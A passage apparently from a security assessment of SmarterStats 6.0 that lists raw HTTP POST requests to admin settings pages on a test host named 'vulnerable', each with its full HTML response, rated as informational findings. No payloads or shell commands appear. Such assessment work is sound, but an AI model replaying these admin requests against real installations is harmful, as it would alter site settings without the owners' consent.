$(function() {$vc({"lt":"Import Frequency","vcID":"ctl00_MPH_ImportingServerFields1_txtIdleTimeBetweenLoops_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Import Time per Site","vcID":"ctl00_MPH_ImportingServerFields1_txtReaderTimeSlice_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Rows Before Sleep","vcID":"ctl00_MPH_ImportingServerFields1_txtRowsBeforeSleep_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Row Sleep Time","vcID":"ctl00_MPH_ImportingServerFields1_txtRowSleepTime_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":0}},false);});
$(function() {$vc({"lt":"Debug Level","vcID":"ctl00_MPH_ImportingServerFields1_txtDebugLevel_SettingText","VMs":["vmNumber"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Max Sessions Per Site","vcID":"ctl00_MPH_ImportingServerFields1_txtMaxSessions_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Session Timeout","vcID":"ctl00_MPH_ImportingServerFields1_txtSessionTimeout_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


11.3. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmReportSettings.aspx

Request

POST /Admin/frmReportSettings.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmReportSettings.aspx
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"208759633","TopBarSection":"AdminSettings"}; ASP.NET_SessionId=goyfjk5bgnfdbekr0r35mk2c;
Content-Type: application/x-www-form-urlencoded
Content-Length: 10765

ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDefaultCustomReportDayRange_SettingText=62&ctl00%24MPH%24txtMaxDNSThreads_SettingText=100&ctl00%24MPH%24lstSendInterval_SettingDropDown=2&__VIEWSTATE=[...]&ctl00%24MPH%24txtDefaultStandardReportDayRange_SettingText=62&ctl00%24MPH%24lstSleepTime_SettingDropDown=2&__EVENTTARGET=&ctl00%24MPH%24lstMaxRowsDns_SettingDropDown=50&__EVENTARGUMENT=&ctl00%24MPH%24txtCustomReportItemLimit_SettingText=10&ctl00%24MPH%24chkSendErrorsEnabled_SettingCheck=on&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:39 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Tue, 12 Oct 2010 05:22:39 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 27438
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Report Settings - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmReportSettings.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[...]" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=A9pC7Zm-KCpQcgrv_k8kri_gOPHbfERI0dufcaagWzEba-1yxTkhsaFA2m9iF-X5YqK0XNPqsFxLS_SFDYkSVh9nUPFqs2OyCDrKdTfvfrMuUlk67QCsv25m8qReQpSVlXorL9IfscXz2o8ZMhLIvvadK3tiZWlccHVt2Ooi2hhOsVAvQO2j3e4BUVWja_ET0&amp;t=2610f696" type="text/javascript"></script>

       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel2',''], [], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       Report Settings
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
<div id="ctl00_BPH_btnSave" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$BPH$btnSave',''); return false;"><span class="BBInner">Save</span></a></div>

           </div>
           <div class="ButtonBarRight">
               
           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               
           </span>
       <div id="ctl00_trTabStrip" class="TabStripContainer">
           

<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>DNS Resolution</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Email</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>


       </div>
       <div id="Scrollable" class="ContentDiv">
           
<div id="ctl00_MPH_UpdatePanel2">
   

<!-- HyperMultiPage -->
   <div class='' id='ctl00_MPH_MP1'>
       <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />

<div id='ctl00_MPH_OptionsTab' class='' >
           <span id="ctl00_MPH_OptionsTab">
<table id="ctl00_MPH_tblOptions" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtDefaultStandardReportDayRange">
                   <td id="ctl00_MPH_txtDefaultStandardReportDayRange_Label" class="Indent Fixed">Standard Report Limit</td><td id="ctl00_MPH_txtDefaultStandardReportDayRange_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultStandardReportDayRange_SettingText" type="text" value="62" size="3" id="ctl00_MPH_txtDefaultStandardReportDayRange_SettingText" class="text" /> Day(s)</td>
               </tr><tr id="ctl00_MPH_txtDefaultCustomReportDayRange">
                   <td id="ctl00_MPH_txtDefaultCustomReportDayRange_Label" class="Indent Fixed">Custom Report Limit</td><td id="ctl00_MPH_txtDefaultCustomReportDayRange_Setting" class="Setting"><input name="ctl00$MPH$txtDefaultCustomReportDayRange_SettingText" type="text" value="62" size="3" id="ctl00_MPH_txtDefaultCustomReportDayRange_SettingText" class="text" /> Day(s)</td>
               </tr><tr id="ctl00_MPH_txtCustomReportItemLimit">
                   <td id="ctl00_MPH_txtCustomReportItemLimit_Label" class="Indent Fixed">Max Items per Report</td><td id="ctl00_MPH_txtCustomReportItemLimit_Setting" class="Setting"><input name="ctl00$MPH$txtCustomReportItemLimit_SettingText" type="text" value="10" size="3" id="ctl00_MPH_txtCustomReportItemLimit_SettingText" class="text" /> Item(s)</td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_DNSResolutionTab' class='' style='display:none'>
           <span id="ctl00_MPH_DNSResolutionTab">
<table id="ctl00_MPH_Table1" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_txtMaxDNSThreads">
                   <td id="ctl00_MPH_txtMaxDNSThreads_Label" class="Indent Fixed">DNS Threads</td><td id="ctl00_MPH_txtMaxDNSThreads_Setting" class="Setting"><input name="ctl00$MPH$txtMaxDNSThreads_SettingText" type="text" value="100" size="3" id="ctl00_MPH_txtMaxDNSThreads_SettingText" class="text" /></td>
               </tr><tr id="ctl00_MPH_lstMaxRowsDns">
                   <td id="ctl00_MPH_lstMaxRowsDns_Label" class="Indent Fixed">Max Lookups per Report</td><td id="ctl00_MPH_lstMaxRowsDns_Setting" class="Setting"><select name="ctl00$MPH$lstMaxRowsDns_SettingDropDown" id="ctl00_MPH_lstMaxRowsDns_SettingDropDown">
                       <option value="-1">All Rows</option>
                       <option selected="selected" value="50">50</option>
                       <option value="100">100</option>
                       <option value="200">200</option>
                       <option value="300">300</option>
                       <option value="400">400</option>
                       <option value="500">500</option>
                       <option value="600">600</option>
                       <option value="700">700</option>
                       <option value="800">800</option>
                       <option value="900">900</option>
                       <option value="1000">1000</option>
                       <option value="1100">1100</option>
                       <option value="1200">1200</option>
                       <option value="1300">1300</option>
                       <option value="1400">1400</option>
                       <option value="1500">1500</option>
                       <option value="1600">1600</option>
                       <option value="1700">1700</option>
                       <option value="1800">1800</option>
                       <option value="1900">1900</option>
                       <option value="2000">2000</option>
                       <option value="2100">2100</option>
                       <option value="2200">2200</option>
                       <option value="2300">2300</option>
                       <option value="2400">2400</option>
                       <option value="2500">2500</option>
                       <option value="2600">2600</option>
                       <option value="2700">2700</option>
                       <option value="2800">2800</option>
                       <option value="2900">2900</option>
                       <option value="3000">3000</option>
                       <option value="3100">3100</option>
                       <option value="3200">3200</option>
                       <option value="3300">3300</option>
                       <option value="3400">3400</option>
                       <option value="3500">3500</option>
                       <option value="3600">3600</option>
                       <option value="3700">3700</option>
                       <option value="3800">3800</option>
                       <option value="3900">3900</option>
                       <option value="4000">4000</option>
                       <option value="4100">4100</option>
                       <option value="4200">4200</option>
                       <option value="4300">4300</option>
                       <option value="4400">4400</option>
                       <option value="4500">4500</option>
                       <option value="4600">4600</option>
                       <option value="4700">4700</option>
                       <option value="4800">4800</option>
                       <option value="4900">4900</option>
                       <option value="5000">5000</option>
                       <option value="5100">5100</option>
                       <option value="5200">5200</option>
                       <option value="5300">5300</option>
                       <option value="5400">5400</option>
                       <option value="5500">5500</option>
                       <option value="5600">5600</option>
                       <option value="5700">5700</option>
                       <option value="5800">5800</option>
                       <option value="5900">5900</option>
                       <option value="6000">6000</option>
                       <option value="6100">6100</option>
                       <option value="6200">6200</option>
                       <option value="6300">6300</option>
                       <option value="6400">6400</option>
                       <option value="6500">6500</option>
                       <option value="6600">6600</option>
                       <option value="6700">6700</option>
                       <option value="6800">6800</option>
                       <option value="6900">6900</option>
                       <option value="7000">7000</option>
                       <option value="7100">7100</option>
                       <option value="7200">7200</option>
                       <option value="7300">7300</option>
                       <option value="7400">7400</option>
                       <option value="7500">7500</option>
                       <option value="7600">7600</option>
                       <option value="7700">7700</option>
                       <option value="7800">7800</option>
                       <option value="7900">7900</option>
                       <option value="8000">8000</option>
                       <option value="8100">8100</option>
                       <option value="8200">8200</option>
                       <option value="8300">8300</option>
                       <option value="8400">8400</option>
                       <option value="8500">8500</option>
                       <option value="8600">8600</option>
                       <option value="8700">8700</option>
                       <option value="8800">8800</option>
                       <option value="8900">8900</option>
                       <option value="9000">9000</option>
                       <option value="9100">9100</option>
                       <option value="9200">9200</option>
                       <option value="9300">9300</option>
                       <option value="9400">9400</option>
                       <option value="9500">9500</option>
                       <option value="9600">9600</option>
                       <option value="9700">9700</option>
                       <option value="9800">9800</option>
                       <option value="9900">9900</option>
                       <option value="10000">10000</option>

                   </select></td>
               </tr>
           </table>
</span></div>
       

<div id='ctl00_MPH_EmailTab' class='' style='display:none'>
           <span id="ctl00_MPH_EmailTab">
<table id="ctl00_MPH_tblAdministraativeEmails" class="SettingsContainer" border="0">
               <tr id="ctl00_MPH_lstSendInterval">
                   <td id="ctl00_MPH_lstSendInterval_Label" class="Indent Fixed">Processing Interval</td><td id="ctl00_MPH_lstSendInterval_Setting" class="Setting"><select name="ctl00$MPH$lstSendInterval_SettingDropDown" id="ctl00_MPH_lstSendInterval_SettingDropDown">
                       <option value="1">1</option>
                       <option selected="selected" value="2">2</option>
                       <option value="3">3</option>
                       <option value="4">4</option>
                       <option value="5">5</option>
                       <option value="6">6</option>
                       <option value="7">7</option>
                       <option value="8">8</option>
                       <option value="9">9</option>
                       <option value="10">10</option>
                       <option value="11">11</option>
                       <option value="12">12</option>

                   </select> Hour(s)</td>
               </tr><tr id="ctl00_MPH_lstSleepTime">
                   <td id="ctl00_MPH_lstSleepTime_Label" class="Indent Fixed">Sleep Between Reports</td><td id="ctl00_MPH_lstSleepTime_Setting" class="Setting"><select name="ctl00$MPH$lstSleepTime_SettingDropDown" id="ctl00_MPH_lstSleepTime_SettingDropDown">
                       <option value="1">1</option>
                       <option selected="selected" value="2">2</option>
                       <option value="3">3</option>
                       <option value="4">4</option>
                       <option value="5">5</option>
                       <option value="6">6</option>
                       <option value="7">7</option>
                       <option value="8">8</option>
                       <option value="9">9</option>
                       <option value="10">10</option>
                       <option value="11">11</option>
                       <option value="12">12</option>
                       <option value="13">13</option>
                       <option value="14">14</option>
                       <option value="15">15</option>
                       <option value="16">16</option>
                       <option value="17">17</option>
                       <option value="18">18</option>
                       <option value="19">19</option>
                       <option value="20">20</option>
                       <option value="21">21</option>
                       <option value="22">22</option>
                       <option value="23">23</option>
                       <option value="24">24</option>
                       <option value="25">25</option>
                       <option value="26">26</option>
                       <option value="27">27</option>
                       <option value="28">28</option>
                       <option value="29">29</option>
                       <option value="30">30</option>
                       <option value="31">31</option>
                       <option value="32">32</option>
                       <option value="33">33</option>
                       <option value="34">34</option>
                       <option value="35">35</option>
                       <option value="36">36</option>
                       <option value="37">37</option>
                       <option value="38">38</option>
                       <option value="39">39</option>
                       <option value="40">40</option>
                       <option value="41">41</option>
                       <option value="42">42</option>
                       <option value="43">43</option>
                       <option value="44">44</option>
                       <option value="45">45</option>
                       <option value="46">46</option>
                       <option value="47">47</option>
                       <option value="48">48</option>
                       <option value="49">49</option>
                       <option value="50">50</option>

                   </select> Millisecond(s)</td>
               </tr><tr id="ctl00_MPH_chkSendErrorsEnabled">
                   <td id="ctl00_MPH_chkSendErrorsEnabled_Label" class="Indent Fixed"></td><td id="ctl00_MPH_chkSendErrorsEnabled_Setting" class="Setting"><input id="ctl00_MPH_chkSendErrorsEnabled_SettingCheck" type="checkbox" name="ctl00$MPH$chkSendErrorsEnabled_SettingCheck" checked="checked" /><label for="ctl00_MPH_chkSendErrorsEnabled_SettingCheck">Enable admin error emails</label></td>
               </tr>
           </table>
</span></div>
       

</div>
   

</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmreportsettings', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   

<script type="text/javascript">
//<![CDATA[
$(function() { SetTopTitle('Report\x20Settings'); });
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_DNSResolutionTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_EmailTab"},"ClientCallbacks":{}}); });
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Standard Report Limit","vcID":"ctl00_MPH_txtDefaultStandardReportDayRange_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Custom Report Limit","vcID":"ctl00_MPH_txtDefaultCustomReportDayRange_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Items per Report","vcID":"ctl00_MPH_txtCustomReportItemLimit_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
modules['vmNumberLess_txt']='Must be {0} or less';
$(function() {$vc({"lt":"DNS Threads","vcID":"ctl00_MPH_txtMaxDNSThreads_SettingText","VMs":["vmNumber","vmNumberGreater","vmNumberLess"],"VPs":{"vmRequired":true,"vmNumberGreater":1,"vmNumberLess":2000}},false);});
//]]>
</script>
</form>
</body>
</html>


11.4. http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Admin/frmSite.aspx

Request

POST /Admin/frmSite.aspx?SiteId=1&popup=true HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Admin/frmSite.aspx?SiteId=1&popup=true
Origin: http://vulnerable.smarterstats.6.0.host:9999
X-Requested-With: XMLHttpRequest
X-MicrosoftAjax: Delta=true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1413386179","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=
Content-Length: 30100

ctl00%24ScriptManager1=ctl00%24MPH%24UpdatePanel5%7Cctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTTARGET=ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=[...]&ctl00%24TPH%24HyperTabStrip1%24SelectedTab=ctl00_TPH_HyperTabStrip1_HyperTabItem1&ctl00%24MPH%24VisiblePage=ctl00_MPH_OptionsTab&ctl00%24MPH%24txtDomainName_SettingText=hoyt.net&ctl00%24MPH%24txtDomainUrl_SettingText=&ctl00%24MPH%24lstServer_SettingDropDown=1&ctl00%24MPH%24lstStatus_SettingDropDown=start&ctl00%24MPH%24txtSmarterLogDirectory=C%3A%5CSmarterLogs&ctl00%24MPH%24ddlChangeSiteAdmin_SettingDropDown=&ctl00%24MPH%24chkSeoEnabled_SettingCheck=on&ctl00%24MPH%24lstLogLocation_SettingDropDown=Local&ctl00%24MPH%24lstLogFormat_SettingDropDown=W3Cex&ctl00%24MPH%24lstMonthsToKeepSmStats_SettingDropDown=0&ctl00%24MPH%24txtExportLogDirectory=&ctl00%24MPH%24txtLogFileExportLocURL_SettingText=&ctl00%24MPH%24txtDefaultDocuments_SettingText=index.htm%0Aindex.html%0Adefault.asp%0Adefault.aspx&ctl00_MPH_grdLogLocations_HiddenInput=ctl00_MPH_grdLogLocations_CB64_OTg3ZTY2NDQzZTUxNDk5MGE4YWZjZmI0NTZhMjMyYzA-&ctl00_MPH_grdLogLocations_HiddenLSR=0&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxKeywords_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxCompetitors_SettingText=5&ctl00%24MPH%24ucSiteSeoSettings%24txtSeoMaxRanking_SettingText=100&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%240=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%248=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2415=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%241=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%249=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2416=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%242=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2410=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2417=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%243=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2411=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2418=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%244=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2412=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2419=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%245=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2413=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2420=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%246=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2414=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%2421=on&ctl00%24MPH%24ucSiteSeoSearchEngineSettings%24chklistEngines_SettingCheckBox%247=on&ctl00_MPH_grdLogStatus_HiddenInput=&ctl00_MPH_grdLogStatus_HiddenLSR=&ctl00_MPH_grdSeoStatus_HiddenInput=&ctl00_MPH_grdSeoStatus_HiddenLSR=&__ASYNCPOST=true&

Response

HTTP/2.0 100 Continue
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:06 GMT
Content-Length: 0

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:06 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Connection: Close
Content-Length: 56808

1|#||4|11|updatePanel|ctl00_UpdatePanel1|
               
           |1411|updatePanel|ctl00_TPH_UpdatePanel1|
           
<!-- HyperTabStrip -->
<div class='htsTabStrip htsTabBar'><ul id='ctl00_TPH_HyperTabStrip1'>
   <li class='htsItem htsFirst htsSelected' id='ctl00_TPH_HyperTabStrip1_HyperTabItem1'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem2'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem3'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Locations</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem5'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Options</span></span></a></li>
   <li class='htsItem ' id='ctl00_TPH_HyperTabStrip1_HyperTabItem7'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>Log Status</span></span></a></li>
   <li class='htsItem htsLast' id='ctl00_TPH_HyperTabStrip1_HyperTabItem8'><a class='htsA' href='#'><span class='htsOuter'><span class='htsInner'>SEO Processing Status</span></span></a></li>
</ul>
<input type="hidden" name="ctl00$TPH$HyperTabStrip1$SelectedTab" id="ctl00_TPH_HyperTabStrip1_SelectedTab" value="ctl00_TPH_HyperTabStrip1_HyperTabItem1" /><div class='htsClear'><div class='ie6fix'>&nbsp;</div></div></div>

       |22883|updatePanel|ctl00_MPH_UpdatePanel5|
           
           <a id="ctl00_MPH_btnUpdateIISImport" href="javascript:__doPostBack(&#39;ctl00$MPH$btnUpdateIISImport&#39;,&#39;&#39;)" style="display: none"></a>
           <a id="ctl00_MPH_btnRefresh" href="javascript:__doPostBack(&#39;ctl00$MPH$btnRefresh&#39;,&#39;&#39;)" style="display: none"></a>
           
<!-- HyperMultiPage -->
<div class='' id='ctl00_MPH_MP1'>
   <input type="hidden" name="ctl00$MPH$VisiblePage" id="ctl00_MPH_VisiblePage" value="ctl00_MPH_OptionsTab" />
               <div id='ctl00_MPH_OptionsTab' class='' >
       <span id="ctl00_MPH_OptionsTab">
                   <table id="ctl00_MPH_tblAdminMain" class="SettingsContainer" border="0">
           <tr id="ctl00_MPH_txtDomainName">
               <td id="ctl00_MPH_txtDomainName_Label" class="Indent Fixed">Site Name</td><td id="ctl00_MPH_txtDomainName_Setting" class="Setting"><input name="ctl00$MPH$txtDomainName_SettingText" type="text" value="vilnerable.smarterstats.6.0.host" size="50" id="ctl00_MPH_txtDomainName_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtDomainUrl">
               <td id="ctl00_MPH_txtDomainUrl_Label" class="Indent Fixed">Site Url</td><td id="ctl00_MPH_txtDomainUrl_Setting" class="Setting"><input name="ctl00$MPH$txtDomainUrl_SettingText" type="text" size="50" id="ctl00_MPH_txtDomainUrl_SettingText" class="text" /></td>
           </tr><tr id="ctl00_MPH_txtSiteId">
               <td id="ctl00_MPH_txtSiteId_Label" class="Indent Fixed">Site ID</td><td id="ctl00_MPH_txtSiteId_Setting" class="Setting"><span id="ctl00_MPH_txtSiteId_ReadOnlyLabel">1</span></td>
           </tr><tr id="ctl00_MPH_lstServer">
               <td id="ctl00_MPH_lstServer_Label" class="Indent Fixed">Server</td><td id="ctl00_MPH_lstServer_Setting" class="Setting"><select name="ctl00$MPH$lstServer_SettingDropDown" id="ctl00_MPH_lstServer_SettingDropDown">
                   <option selected="selected" value="1">localhost</option>

               </select></td>
           </tr><tr id="ctl00_MPH_lstStatus">
               <td id="ctl00_MPH_lstStatus_Label" class="Indent Fixed">Current State</td><td id="ctl00_MPH_lstStatus_Setting" class="Setting"><select name="ctl00$MPH$lstStatus_SettingDropDown" id="ctl00_MPH_lstStatus_SettingDropDown">
                   <option selected="selected" value="start">Started</option>
                   <option value="paused">Paused</option>
                   <option value="disabled">Disabled</option>

               </select></td>
           </tr><tr id="ctl00_MPH_exSettingSmarterLogs">
